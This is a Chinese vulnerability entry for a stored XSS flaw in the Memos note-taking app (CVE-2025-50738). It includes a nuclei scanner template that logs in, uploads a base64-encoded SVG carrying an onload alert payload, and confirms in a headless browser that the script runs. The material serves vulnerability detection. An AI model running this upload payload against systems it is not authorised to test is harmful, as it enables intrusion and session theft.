漏洞信息
漏洞名称: Memos Stored XSS via SVG File Upload Vulnerability
漏洞编号:
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: Memos是一款开源的笔记和知识管理工具,广泛用于个人和小型团队的知识管理和信息共享。它支持多用户协作,通常部署在私有服务器或云平台上,便于团队成员之间的信息交流和文档共享。该工具因其简洁的界面和高效的功能而受到用户的欢迎。此次发现的漏洞存在于Memos的SVG文件上传功能中,攻击者可以通过上传包含恶意JavaScript代码的SVG文件,触发存储型跨站脚本(XSS)攻击。这种漏洞的根本原因在于应用程序未能对上传的SVG文件内容进行充分的输入验证和过滤,导致恶意脚本在用户浏览时被执行。由于XSS漏洞可以在用户不知情的情况下执行任意JavaScript代码,攻击者可以利用此漏洞窃取用户的会话令牌、重定向用户到恶意网站或在用户浏览器中执行其他恶意操作。值得注意的是,此漏洞需要攻击者拥有有效的用户凭证,因此属于认证后的攻击。尽管如此,一旦攻击者获得访问权限,他们可以轻松地利用此漏洞对其他用户发起攻击,增加了企业内部的安全风险。
产品厂商: usememos
产品名称: Memos
影响版本: < 0.25.0
来源: https://github.com/projectdiscovery/nuclei-templates/blob/c58f2a2ddff52ea95ffc5a820dd115bbc5842c31/headless%2Fcves%2F2025%2FCVE-2025-50738.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
|
id: CVE-2025-50738
info:
name: Memos < 0.25.0 - Stored XSS via SVG File Upload (Fixed Matcher)
author: SeongHyeonJeon[nukunga]
severity: medium
description: |
An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
reference:
- https://github.com/usememos/memos/issues/4707
- https://github.com/advisories/GHSA-hfcf-79gh-f3jc
- https://nvd.nist.gov/vuln/detail/CVE-2025-50738
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
cvss-score: 9.8
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
tags: xss,stored-xss,memos,authenticated,ghsa,intrusive,headless
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{rand_base(8)}}"
http:
- raw:
- |
POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
extractors:
- type: regex
part: header
name: access_token
internal: true
group: 1
regex:
- 'memos\.access-token=([^;]+);'
- method: POST
path:
- "{{BaseURL}}/api/v1/resources"
headers:
Cookie: "memos.access-token={{access_token}}"
Content-Type: "application/json"
body: |
{
"filename": "{{filename}}.svg",
"content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
"type": "image/svg+xml"
}
extractors:
- type: regex
name: resource_id
internal: true
part: body
group: 1
regex:
- '"name":"resources/([A-Za-z0-9]+)"'
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}/file/resources/{{resource_id}}/{{filename}}.svg"
- action: waitdialog
name: xss_alert
matchers:
- type: dsl
dsl:
- xss_alert == true
- xss_alert_message == "1"
- xss_alert_type == "alert"
condition: and
|